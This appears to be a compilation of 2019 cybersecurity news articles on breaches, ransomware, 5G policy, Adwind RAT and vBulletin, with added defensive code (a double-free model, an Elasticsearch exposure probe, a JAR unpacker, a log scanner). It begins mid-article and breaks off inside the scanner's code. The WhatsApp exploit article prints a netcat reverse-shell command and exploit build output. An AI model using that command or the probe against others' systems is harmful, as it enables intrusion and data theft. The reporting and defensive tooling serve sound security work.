Di Maio explained that the Italian Government opted to protect its infrastructure invoking the so-called “golden powers” in supply deals for fifth-generation (5G) telecom services. According to Di Maio, the golden powers over the supply deals on technology “make [Italy] among the most advanced in Europe on security”.

“We have no intention of taking part in trade accords that might harm our sovereignty as a state,” he added.

In September, Italy exercised special powers in relation to the purchase of goods and services. The Italian government will impose conditions and technical specifications for the purchase of equipment and services for its 5G infrastructure.

In August, Romania announced it would ban Chinese giant Huawei from its 5G network, according to a joint statement signed by the Romanian and US presidents.

In April, British Government approved a limited role for Huawei in the building of a national 5G network in the country, ignoring security concerns from senior ministers. In December, a Czech cyber-security agency warned against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese giant was already excluded by several countries from building their 5G internet networks. The United States, Australia, New Zealand, and Japan announced the exclusion of Huawei technology from their 5G internet networks.

Pierluigi Paganini

(SecurityAffairs – China, 5G)

Zendesk 2016 security breach may impact Uber, Slack, and over 100k organizations

Zendesk discloses a data breach that took place in 2016 when a hacker accessed data of 10,000 users, including passwords, emails, names, and phone numbers.

In 2016, customer service software company Zendesk suffered a security breach that exposed data of 10,000 users, including passwords, emails, names, and phone numbers. Zendesk software is currently used by more than one hundred thousand organizations worldwide, including Uber, Shopify, Airbnb, and Slack.

Today the company published a security notice to disclose the incident.

“We recently were alerted by a third party regarding a security matter that may have affected the Zendesk Support and Chat products and customer accounts of those products activated prior to November of 2016.” reads the security notice. “While our investigation is still ongoing, on September 24, 2019, we determined that information belonging to a small percentage of customers was accessed prior to November of 2016.”

The company was informed by a third party regarding the security breach that might have impacted Zendesk Support and Chat accounts activated prior to November 1, 2016.

As of September 24, 2019 the company had identified approximately 10,000 Zendesk Support and Chat accounts, including expired trials and accounts that are no longer active.

The customer service software firm decided to alert all the impacted users, inviting them to take the following steps:

  • If you installed a Zendesk Marketplace or private app prior to November 1, 2016 that saved authentication credentials such as API keys or passwords during installation, we recommend that you rotate all credentials for the respective app.
  • In addition, if you uploaded a TLS certificate to Zendesk prior to November 1, 2016 which is still valid, we recommend you upload a new certificate, and revoke the old one
  • While we have no indication at this time that other authentication credentials were accessed, customers may want to consider rotating authentication credentials used in Zendesk products prior to November 1, 2016. API Tokens in Chat do not need to be rotated.

The customer support ticketing platform discovered that the following customer information might have been accessed by the attacker:

  • Agent and end-user names that were hashed and salted
  • Contact information
  • Usernames and hashed and salted passwords
  • Transport Layer Security (TLS) encryption keys provided to Zendesk by customers
  • Configuration settings of apps installed from the Zendesk app marketplace or private apps   

The company announced that as a precautionary measure it will implement password rotations for all active agents in Support and Chat, and all end users in Support created prior to November 1, 2016. 

“Our security team is committed to determining the full extent of the data exposure and we will update you if we learn of any additional information that pertains to unauthorized access to your account so you can take appropriate proactive measures to protect your business,” concludes Zendesk.

In any case, customers are invited to change their passwords.

This isn’t the first security breach suffered by Zendesk; the company was already breached in 2013.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Researcher discovered a double-free vulnerability in WhatsApp for Android that could be exploited by remote attackers to execute arbitrary code on the vulnerable device.

A security researcher who goes online by the moniker Awakened discovered a double-free vulnerability in WhatsApp for Android and demonstrated how to leverage it to remotely execute arbitrary code on the target device.

The expert reported the issue to Facebook that acknowledged and addressed the flaw with the release of WhatsApp version 2.19.244.

The expert discovered that the flaw resides in the DDGifSlurp() function in decoding.c of the libpl_droidsonroids_gif.so library, which is used to generate the preview of a GIF file when a user opens the Gallery view in the popular messaging application to send a media file.

“When the WhatsApp Gallery is opened, the said GIF file triggers the double-free bug on rasterBits buffer with size sizeof(GifInfo). Interestingly, in WhatsApp Gallery, a GIF file is parsed twice. When the said GIF file is parsed again, another GifInfo object is created.” reads a technical analysis published by the expert. “Because of the double-free behavior in Android, GifInfo info object and info->rasterBits will point to the same address. DDGifSlurp() will then decode the first frame to info->rasterBits buffer, thus overwriting info and its rewindFunction(), which is called right at the end of DDGifSlurp() function.”
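To make the aliasing described above concrete, here is a constructed user-space model, added here and not code from WhatsApp or the GIF library: a tiny free-list allocator stands in for the system heap, every chunk is sizeof(GifInfo), and only the names GifInfo, rasterBits, rewindFunction and DDGifSlurp come from the analysis. The trigger (a frame buffer released twice on an error path while the first GifInfo stays alive) and everything else are assumptions; the hardened variant clears the pointer after the first free, so the second parse gets a distinct buffer.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct GifInfo GifInfo;
typedef void (*RewindFn)(GifInfo *);

struct GifInfo {
    unsigned char *rasterBits;   /* decoded frame buffer */
    RewindFn rewindFunction;     /* invoked at the end of DDGifSlurp() */
};

/* Tiny LIFO free-list allocator standing in for the system heap (assumed
 * model). Every chunk is sizeof(GifInfo), as in the described bug, and like
 * a heap without double-free detection it records the same chunk twice. */
#define CHUNKS 4
typedef union Chunk { GifInfo obj; unsigned char raw[sizeof(GifInfo)]; } Chunk;
static Chunk pool[CHUNKS];
static int free_stack[2 * CHUNKS];   /* oversized: duplicates may be pushed */
static int free_top;

static void heap_reset(void) {
    free_top = 0;
    for (int i = CHUNKS - 1; i >= 0; i--)
        free_stack[free_top++] = i;      /* chunk 0 is handed out first */
}

static void *heap_alloc(void) {
    return free_top > 0 ? (void *)&pool[free_stack[--free_top]] : NULL;
}

static void heap_free(void *p) {
    if (p == NULL) return;               /* free(NULL) is a no-op */
    int idx = (int)(((unsigned char *)p - (unsigned char *)pool) / sizeof(Chunk));
    free_stack[free_top++] = idx;        /* no check: pushing twice is the bug */
}

static void real_rewind(GifInfo *info) { (void)info; }

/* First pass over the crafted file (assumed trigger). The frame buffer is
 * released by the frame cleanup and again by the object cleanup; with
 * `hardened` set the first release clears the pointer, so the second one is
 * a no-op. The GifInfo itself stays alive in this model. */
static void first_parse(int hardened) {
    GifInfo *info = heap_alloc();
    info->rewindFunction = real_rewind;
    info->rasterBits = heap_alloc();
    /* ... decoding fails on the crafted frame header ... */
    heap_free(info->rasterBits);             /* frame cleanup */
    if (hardened) info->rasterBits = NULL;   /* FIX: never keep a dangling pointer */
    heap_free(info->rasterBits);             /* object cleanup: double free unless cleared */
}

/* Second pass: a new GifInfo is created and the first frame is decoded into
 * its rasterBits. Returns 1 if the frame bytes landed on the GifInfo itself
 * (the two allocations aliased), 0 otherwise. */
static int second_parse(const unsigned char *frame, size_t frame_len) {
    GifInfo *info = heap_alloc();
    info->rewindFunction = real_rewind;
    info->rasterBits = heap_alloc();
    if (frame_len > sizeof(GifInfo)) frame_len = sizeof(GifInfo);
    memcpy(info->rasterBits, frame, frame_len);   /* DDGifSlurp()-style decode */
    return info->rewindFunction != real_rewind;   /* function pointer clobbered? */
}

/* Runs both passes the way the Gallery preview would. Returns 1 when the
 * decoded frame reached the rewindFunction slot, 0 when it stayed intact. */
int gallery_preview(int hardened) {
    unsigned char frame[sizeof(GifInfo)];
    memset(frame, 0x41, sizeof frame);       /* constructed frame payload */
    heap_reset();
    first_parse(hardened);
    return second_parse(frame, sizeof frame);
}

int main(void) {
    printf("unpatched: rewindFunction overwritten = %d\n", gallery_preview(0));
    printf("hardened:  rewindFunction overwritten = %d\n", gallery_preview(1));
    return 0;
}
```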

The expert was able to craft a GIF file to control the PC register, then he successfully achieved remote code execution by executing the following command:

system("toybox nc 192.168.2.72 4444 | sh");

The expert highlighted that it was not possible to point directly to the system() function in libc.so; instead, it was necessary to first let the PC jump to an intermediate gadget.

“We need an information disclosure vulnerability that gives us the base address of libc.so and libhwui.so. That vulnerability is not in the scope of this blogpost.” continues the expert. “Note that the address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability.”

The expert developed the code that was able to generate a corrupted GIF file that could exploit the vulnerability.

notroot@osboxes:~/Desktop/gif$ gcc -o exploit egif_lib.c exploit.c
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit
buffer = 0x7ffc586cd8b0 size = 266

Then he copied the content into a GIF file and sent it as a Document with WhatsApp to another WhatsApp user. The researcher explained that the crafted GIF file could not be sent as a Media file, because WhatsApp attempts to convert it into an MP4 before sending it. The vulnerability is triggered when the target user who received the malicious GIF file opens the WhatsApp Gallery to send a media file to a friend.

Below are the attack vectors devised by the expert:

  1. Local privilege escalation (from a user app to WhatsApp): A malicious app is installed on the Android device. The app collects addresses of zygote libraries and generates a malicious GIF file that results in code execution in the WhatsApp context. This allows the malware app to steal files in the WhatsApp sandbox, including the message database.
  2. Remote code execution: Pairing with an application that has a remote memory information disclosure vulnerability (e.g. a browser), the attacker can collect the addresses of zygote libraries and craft a malicious GIF file to send to the user via WhatsApp (must be as an attachment, not as an image through the Gallery Picker). When the user opens the Gallery view in WhatsApp, the GIF file will trigger a remote shell in the WhatsApp context.

The exploit works for WhatsApp version 2.19.230 and prior versions; the company addressed it with the release of version 2.19.244.

The exploit works for Android 8.1 and 9.0, but the expert explained that it does not work for Android 8.0 and below.

“In the older Android versions, double-free could still be triggered. However, because of the calls by the system after the double-free, the app just crashes before reaching to the point that we could control the PC register.” concludes the expert.

Pierluigi Paganini

(SecurityAffairs – WhatsApp, hacking)

Former American Express employee under investigation for customers’ data abuse

Authorities are investigating an American Express employee for unauthorized access to cardholder information and its potential abuse for fraud.

Authorities launched a criminal investigation into an American Express employee suspected of having accessed cardholder information and potentially abused it for fraud.

Exposed information includes full name, physical and/or billing address, Social Security numbers, birth dates, and the credit card number.

The suspect is no longer working for the financial organization.

On September 30th, 2019, the financial institution began sending out data breach notifications to the impacted customers; the notice informed them that the former employee potentially used the data for fraudulent activities, including identity theft and financial fraud.

“It was brought to our attention that personal information, related to your American Express Card account listed above, may have been wrongfully accessed by one of our employees in an attempt to conduct fraudulent activity, including potentially opening accounts at other financial institutions.” reads the data breach notification. “In response, we immediately launched an investigation and are fully cooperating with law enforcement agencies to further their investigation.”

American Express is offering free credit monitoring services through Experian Identity Works to impacted customers.

The company is also recommending impacted cardholders to monitor their credit report and statements for any fraudulent activity and report any suspicious activity to their bank.

Pierluigi Paganini

(SecurityAffairs – American Express, cybercrime)

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

A new wave of ransomware attacks hit US and Australian hospitals and health service providers causing the paralysis of their systems.

Several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure.

“Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.” reported ArsTechnica.

“All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system.”

According to a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, had limited access to their computing systems.

“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”

Similar problems impacted at least seven hospitals in Australia. The information technology systems at a number of hospitals and health services in Gippsland and south-west Victoria have been impacted by a cyber security incident.

“A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.” reads the security advisory.

“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management. Hospitals have isolated and disconnected a number of systems such as internet to quarantine the infection.”

A couple of weeks ago, the Campbell County Memorial Hospital in Gillette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files. The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)


Experts found 20 Million tax records for Russian citizens exposed online

Experts discovered an unprotected Elasticsearch cluster containing personally identifiable and tax information of Russian citizens exposed online.

Security experts from Comparitech along with security researcher Bob Diachenko discovered 20 million tax records belonging to Russian citizens exposed online in clear text and without protection.

The experts found an unprotected Elasticsearch cluster that was containing personally identifiable information on Russian citizens spanning from 2009 to 2016.

“A database of more than 20 million Russian tax records was found on an unsecured server, accessible to anyone with a web browser.” reads the post published by Comparitech.

“Comparitech partnered with security researcher Bob Diachenko to investigate the data exposure, which included sensitive personal and tax information. The database was taken offline after Diachenko notified the owner, who is based in Ukraine.”

The Elasticsearch database was first indexed by search engines in May 2018, Diachenko discovered it on September 17, 2019, and on September 20, 2019 it was secured.

It is not possible to determine whether anyone else accessed the exposed data before Diachenko discovered it. The experts also revealed that the owner is based in Ukraine, but did not reveal its identity.

The cluster included multiple databases; two of them contained tax and personally identifiable information about Russian citizens, mostly from Moscow and the surrounding area.

“The first database contained more than 14 million personal and tax records from 2010 to 2016, and the second included over 6 million from 2009 to 2015.” continue the experts.

Exposed records included the following information:

  • Full name
  • Address
  • Residency status
  • Passport number
  • Phone number
  • Tax ID number
  • Employer name and phone number
  • Tax amount

The exposed data could be used by threat actors to carry out tax scams and fraud.

“Affected individuals could be at risk of identity theft and should monitor their accounts closely. Tax fraud could also be a risk, though our team is not well-versed enough on the topic of the Russian tax system to give concrete advice.” conclude the experts.

“Potential victims should also be on the lookout for targeted phishing and other scams. Fraudsters could pose as tax officials, for example, to steal money or request additional information to aid in identity theft.”
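An added check for cluster operators, written for this page and not part of the Comparitech or Diachenko write-up: it asks a node's HTTP port the same two questions a browser would, GET / and GET /_cat/indices, and classifies the answers. The host name is the reader's to supply; the responses embedded in the block are constructed to resemble the case above and were not captured from it. A node that comes back "open" should have network.host bound to an internal interface and authentication enabled (xpack.security.enabled: true, or a reverse proxy that demands credentials) before it holds anything like the indices listed here.

```python
import json
import urllib.error
import urllib.request
from typing import List, Tuple

# Constructed sample responses (not captured from the cluster in the article).
SAMPLE_ROOT = json.dumps({
    "name": "node-1", "cluster_name": "elasticsearch",
    "version": {"number": "6.8.2"}, "tagline": "You Know, for Search",
})
SAMPLE_CAT = json.dumps([
    {"index": ".kibana", "docs.count": "3"},
    {"index": "tax_records_2010_2016", "docs.count": "14100000"},
    {"index": "tax_records_2009_2015", "docs.count": "6200000"},
    {"index": "archive_closed", "docs.count": None},   # closed index: no count
])


def classify_root_response(status: int, body: str) -> str:
    """Classify the answer to GET / on an Elasticsearch HTTP port.

    "open":              200 with the cluster_name/version banner, i.e. anyone with a
                         browser can talk to the cluster (the situation in the article)
    "auth_required":     401, an authentication layer sits in front of the node
    "not_elasticsearch": 200 but not the banner (proxy page, some other service)
    "unknown":           any other status
    """
    if status == 401:
        return "auth_required"
    if status != 200:
        return "unknown"
    try:
        data = json.loads(body)
    except ValueError:
        return "not_elasticsearch"
    if isinstance(data, dict) and "cluster_name" in data and "version" in data:
        return "open"
    return "not_elasticsearch"


def parse_cat_indices(body: str) -> List[Tuple[str, int]]:
    """Turn /_cat/indices?format=json&h=index,docs.count into (index, docs) pairs,
    largest first. docs.count is null for closed indices, so it counts as 0."""
    rows = json.loads(body)
    pairs = [(row.get("index", ""), int(row.get("docs.count") or 0)) for row in rows]
    return sorted(pairs, key=lambda p: p[1], reverse=True)


def large_user_indices(indices: List[Tuple[str, int]],
                       min_docs: int = 100_000) -> List[Tuple[str, int]]:
    """Non-system indices (names not starting with '.') holding at least min_docs
    documents: the ones to review for PII before someone else finds them."""
    return [(name, docs) for name, docs in indices
            if docs >= min_docs and not name.startswith(".")]


def _http_get(url: str, timeout: float) -> Tuple[int, str]:
    """GET without credentials; HTTP errors come back as (status, body), not exceptions."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe(host: str, port: int = 9200, timeout: float = 5.0) -> Tuple[str, List[Tuple[str, int]]]:
    """Unauthenticated probe of one node: verdict, plus the index list if it is open."""
    base = f"http://{host}:{port}"
    status, body = _http_get(base + "/", timeout)
    verdict = classify_root_response(status, body)
    indices: List[Tuple[str, int]] = []
    if verdict == "open":
        status, body = _http_get(base + "/_cat/indices?format=json&h=index,docs.count", timeout)
        if status == 200:
            indices = parse_cat_indices(body)
    return verdict, indices


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        verdict, indices = probe(sys.argv[1])
    else:  # offline demo on the constructed responses
        verdict, indices = classify_root_response(200, SAMPLE_ROOT), parse_cat_indices(SAMPLE_CAT)
    print("verdict:", verdict)
    for name, docs in large_user_indices(indices):
        print(f"  {name}: {docs:,} documents")
```

Run it against your own node names from outside the trusted network; an "open" verdict with anything in the large-index list is the finding described in this article, a few hours before someone else makes it.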

Pierluigi Paganini

(SecurityAffairs – Russian citizens, data leak)

The post Experts found 20 Million tax records for Russian citizens exposed online appeared first on Security Affairs.

Teheran: U.S. has started ‘Cyber War’ against Iran

Gholamreza Jalali, chief of Iran’s Passive Defense Organization, declared that the US government has started its cyber war against the country.

Gholamreza Jalali, Iran’s Passive Defense Organization chief, announced that “America has started its cyber war against Iran,” without providing further details.

The news was reported by the ISNA news website on October 1, Jalali also added that Iran “decisively will resort to cyber defense.”

Jalali is an Islamic Revolution Guard Corps (IRGC) brigadier general, in November 2018 he announced that government experts have uncovered and neutralized a new strain of Stuxnet.

“Recently we discovered a new generation of Stuxnet which consisted of several parts … and was trying to enter our systems,” Jalali was quoted as saying by the semi-official ISNA news agency at a news conference marking Iran’s civil defense day.

In May, Jalali had accused the U.S. of carrying out psychological operations through social media aimed at influencing Iranians’ sentiment on specific topics. The official also claimed that Iran is targeted by 50,000 cyberattacks and that the country’s cyber defense suffers eight major attacks annually.

Last week, Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

“it is necessary for all companies and installations of the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry’s Shana website.

Iran fears retaliation from Western countries, which accuse it of carrying out physical and cyber attacks against their infrastructure and against countries in the Middle East.

Military and intelligence experts believe that a Western coalition led by the US could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some Western media reported destructive cyber attacks against infrastructure in the Iranian oil sector, but Iran denied it.

Pierluigi Paganini

(SecurityAffairs – Iran, cyberwar)

The post Teheran: U.S. has started ‘Cyber War’ against Iran appeared first on Security Affairs.

Singapore presented the Operational Technology (OT) Cybersecurity Masterplan

The Cyber Security Agency of Singapore (CSA) presented the Operational Technology (OT) Cybersecurity Masterplan to increase the resilience of Critical Information Infrastructure (CII) sectors.

The Cyber Security Agency of Singapore (CSA) presented the Operational Technology (OT) Cybersecurity Masterplan to enhance the security and resilience of Singapore’s Critical Information Infrastructure (CII) sectors in delivering essential services.

Operational Technology (OT) systems are becoming a favored target for highly sophisticated threat actors, so the CSA is proposing measures to increase the resilience of these systems to cyber attacks.

“The Masterplan serves to improve cross-sector response to mitigate cyber threats in the OT environment and to strengthen partnerships with industry and stakeholders.” reads the announcement published by the CSA. “The OT Cybersecurity Masterplan outlines key initiatives covering the areas of People, Processes and Technology to uplift the of our CII owners and that operate OT systems.”

Singapore is one of the most hyper-connected commercial hubs; for this reason it is essential to adopt all the necessary countermeasures to repel any kind of attack.

Key points in the OT Cybersecurity Masterplan include:

  1. Providing OT cybersecurity training to develop human capabilities
  2. Facilitating the sharing of information through an OT Information Sharing and Analysis Centre (OT-ISAC)
  3. Strengthening OT owners’ policies and processes through the issuance of an OT Cybersecurity Code of Practice (CCoP)
  4. Adopting technologies for cyber resilience through Public-Private Partnerships

The Masterplan encourages OT equipment manufacturers and service providers to implement the best cybersecurity practices by design.

“The OT Cybersecurity Masterplan will serve as a strategic blueprint to guide Singapore’s efforts to foster a resilient and secure cyber environment for our OT CII, while taking a balanced approach between security requirements, rapid digitalisation and ease of conducting business-as-usual activities.” concludes the announcement.

The Singapore OT Cybersecurity Masterplan is available at the following URL:

https://www.csa.gov.sg/~/media/csa/documents/publications/ot_masterplan/otcybersecuritymasterplan.pdf

Pierluigi Paganini

(SecurityAffairs – Cybersecurity Masterplan, Operational Technology)

The post Singapore presented the Operational Technology (OT) Cybersecurity Masterplan appeared first on Security Affairs.

A new Adwind variant involved in attacks on US petroleum industry

Adwind is back, a new variant of the popular RAT is targeting US petroleum industry entities with new advanced features.

A new variant of the popular Adwind RAT (aka jRAT, AlienSpy, and JSocket) is targeting entities in the US petroleum industry. The new variant implements advanced features such as multi-layer obfuscation. The malware is distributed via a malspam campaign; the spam messages come with malicious attachments or include URLs pointing to malicious content.

“A new campaign spreading the Adwind RAT has been seen in the wild, specifically targeting the petroleum industry in the US. The samples are relatively new and implement multi-layer obfuscation to try to evade detection.” reads the analysis published by NetSkope. “We found multiple RAT samples hosted on the serving domain and spread across multiple directories, all hosted within the last month.”

Adwind is a cross-platform Remote Access Trojan written in Java; it has been observed in attacks against aerospace enterprises in Switzerland, Austria, Ukraine, and the US. The Adwind RAT was first spotted in early 2012, when experts dubbed it Frutas RAT; it was later tracked under other names: Unrecom RAT (February 2014), AlienSpy (October 2014), and JSocket RAT (June 2015).

Adwind can infect all the major operating systems, including Windows, Mac, Linux, and Android, and it is sold in the cybercrime underground under a malware-as-a-service (MaaS) model.

Once the Adwind RAT has infected a computer, it can recruit it into a botnet for several illegal purposes (e.g. DDoS or brute-force attacks).

Experts pointed out that the functionality of the RAT has remained the same as in previous variants; the major change is in the obfuscation technique. The malware delivers its RAT payload via nested JAR archives. Netskope Threat Protection detects the malware as ByteCode-JAVA.Trojan.Kryptik and Gen:Variant.Application.Agentus.1.

“When the victim executes the payload, there are multiple levels of JAR extractions that occur.” continues the analysis.
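An added helper for the nested-JAR layering Netskope describes; this is example code written for this page, not Netskope's tooling. It unpacks an archive recursively, records each member's kind, size and SHA-256 (the hash is what you compare against the IoCs in the report), and reports the class files at the deepest level. The three-level sample it builds is constructed and carries no real payload. Real Adwind stages are usually encrypted, so on a live sample the walk stops at an opaque member; the code reports such members as "other" rather than silently skipping them.

```python
import hashlib
import io
import zipfile
from typing import List, Tuple

ZIP_MAGIC = b"PK\x03\x04"          # local file header: start of any non-empty zip/jar
CLASS_MAGIC = b"\xca\xfe\xba\xbe"  # Java class file

# finding = (path, depth, kind, size, sha256)
Finding = Tuple[str, int, str, int, str]


def member_kind(data: bytes) -> str:
    if data.startswith(ZIP_MAGIC):
        return "archive"
    if data.startswith(CLASS_MAGIC):
        return "class"
    return "other"   # manifest, resource, or an encrypted stage this walker cannot open


def walk_nested_jar(data: bytes, prefix: str = "", depth: int = 0,
                    max_depth: int = 8) -> List[Finding]:
    """List every member of a jar, descending into members that are themselves zips.
    Paths use "outer!/inner" notation; depth 0 is the top-level archive."""
    findings: List[Finding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            member = zf.read(info)
            path = prefix + info.filename
            kind = member_kind(member)
            findings.append((path, depth, kind, len(member),
                             hashlib.sha256(member).hexdigest()))
            if kind == "archive" and depth < max_depth:
                findings.extend(walk_nested_jar(member, path + "!/", depth + 1, max_depth))
    return findings


def max_nesting(findings: List[Finding]) -> int:
    return max((f[1] for f in findings), default=0)


def innermost_classes(findings: List[Finding]) -> List[str]:
    """Class files at the deepest level: the ones actually worth decompiling."""
    deepest = max_nesting(findings)
    return [f[0] for f in findings if f[2] == "class" and f[1] == deepest]


def embedded_archives(findings: List[Finding]) -> List[str]:
    return [f[0] for f in findings if f[2] == "archive"]


def build_sample_nested_jar() -> bytes:
    """Constructed three-level sample (not a real Adwind sample):
    outer.jar -> resources/blob.bin (a jar) -> stage2.dat (a jar) -> Main.class"""
    def make_jar(members):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
            for name, content in members:
                z.writestr(name, content)
        return buf.getvalue()

    inner = make_jar([
        ("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Main\n"),
        ("Main.class", CLASS_MAGIC + b"\x00\x00\x00\x34" + b"\x00" * 16),
    ])
    middle = make_jar([("stage2.dat", inner)])
    return make_jar([
        ("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Loader\n"),
        ("Loader.class", CLASS_MAGIC + b"\x00\x00\x00\x34" + b"\x00" * 8),
        ("resources/blob.bin", middle),
    ])


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_nested_jar()
    found = walk_nested_jar(blob)
    for path, depth, kind, size, digest in found:
        print(f"{'  ' * depth}{path}  [{kind}, {size} bytes]  sha256={digest[:16]}...")
    print("nesting depth:", max_nesting(found), "| innermost classes:", innermost_classes(found))
```

Point it at a top-level JAR from a phishing attachment; a large "other" member sitting where you expected the next archive is the encrypted stage, and its hash is still a usable IoC even though the walker cannot open it.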

Netskope researchers discovered 20 malware samples hosted using compromised user accounts of the Australian ISP Westnet.

“The Adwind RAT is a well-known malware family that has actively been used in multiple campaigns over the last couple of years. The samples we analyzed showed that the VirusTotal detection ratio for the top-level JAR was 5/56 while that of the final decrypted JAR was 49/58.” conclude the experts. “These detection ratios indicate that attackers have largely been successful in developing new, innovative obfuscation techniques to evade detection.”

Netskope’s report includes indicators of compromise (IOCs): hashes of the JAR payloads used in these attacks and the IP addresses and domains of the C&C infrastructure.

Pierluigi Paganini

(SecurityAffairs – Adwind, malware)

The post A new Adwind variant involved in attacks on US petroleum industry appeared first on Security Affairs.

Hackers breached one of Comodo Forums, 245,000 users impacted

The ITarian Forum, Comodo’s discussion board and support forum, has been hacked and data belonging to nearly 245,000 registered users has been exposed.

Hackers breached the ITarian Forum, one of Comodo’s discussion and support forums, accessing login credentials of nearly 245,000 users registered with the Comodo Forums websites. Comodo has not specified which of its two forums was hacked. Exposed data include login username, name, email address, hashed passwords, the last IP address used to access the forums, and, for a limited number of users, some social media usernames.

“Very recently a new vulnerability in the vBulletin software, which is one of the most popular server applications for website comments including the Comodo Forums, was made public.” reads the security notice published by Comodo. “Over the weekend at 4:57 am ET on Sunday September 29, 2019, we became aware that this security flaw in the vBulletin software had become exploited resulting in a potential data breach on the Comodo Forums.”

“Our IT infrastructure team immediately took steps to mitigate the exploit by taking the forums offline and applying the recommended patches.”


Comodo attempted to reassure its forum users saying that its staff immediately took the forums offline to apply the necessary countermeasures.

The attackers exploited the recently disclosed zero-day vulnerability in vBulletin (CVE-2019-16759).

The hack of the Comodo forum took place on September 29, a few days after the vBulletin developers released a patch for the flaw, which means that, for some reason, Comodo’s administrators had not yet applied it.

vBulletin is one of the most popular forum software packages, so the disclosure of a zero-day flaw affecting it can impact a wide audience. More than 100,000 websites run on top of vBulletin.

On September 24, an anonymous hacker disclosed technical details and proof-of-concept exploit code for a critical zero-day remote code execution flaw in vBulletin.

Two days later, security expert Troy Mursch of Bad Packets observed a botnet using the recently disclosed vBulletin exploit to compromise vulnerable servers and then patch the flaw on them, so that other threat actors could not take them over. This technique is not new and allows attackers to keep their botnet to themselves.
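An added detection over web-server access logs for the vBulletin flaw; this is example code written for this page, not Comodo's or Bad Packets' tooling. CVE-2019-16759 is reached through vBulletin's ajax/render/widget_php route with attacker-supplied PHP in the widgetConfig[code] parameter, as in the public disclosure. The sample log lines are constructed, not Comodo's. Because access logs omit POST bodies, the script calls any request to that route suspicious and reserves "exploit_attempt" for requests that carry the parameter in the query string; full coverage needs a WAF or request-body logging in front of the forum.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, unquote

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# The route behind CVE-2019-16759 (public disclosure, September 2019).
WIDGET_PHP = re.compile(r"/ajax/render/widget_php(?:/|$)", re.IGNORECASE)

# Constructed sample lines; addresses are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Sep/2019:04:57:12 +0000] "POST /ajax/render/widget_php HTTP/1.1" 200 512 "-" "python-requests/2.22.0"',
    '203.0.113.5 - - [29/Sep/2019:04:57:13 +0000] "GET /ajax/render/widget_php?widgetConfig%5Bcode%5D=phpinfo%28%29%3B HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Sep/2019:05:01:02 +0000] "GET /forum/support/12345-thread HTTP/1.1" 200 8801 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [29/Sep/2019:05:02:40 +0000] "GET /ajax/render/widget_php?widgetConfig%5Btitle%5D=x HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]


def classify_request(target: str) -> str:
    """exploit_attempt: widget_php route with a widgetConfig[code] parameter in the query
    suspicious:      any other hit on widget_php (POST bodies are not logged, so a bare
                     POST to this route is the exploit's most likely footprint)
    benign:          everything else"""
    path, _, query = target.partition("?")
    if not WIDGET_PHP.search(unquote(path)):
        return "benign"
    params = parse_qs(query, keep_blank_values=True)   # decodes %5B / %5D in keys
    if any(key.lower().startswith("widgetconfig[code]") for key in params):
        return "exploit_attempt"
    return "suspicious"


def scan_log(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """(ip, method, verdict, status) for every parseable, non-benign line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m.group("target"))
        if verdict != "benign":
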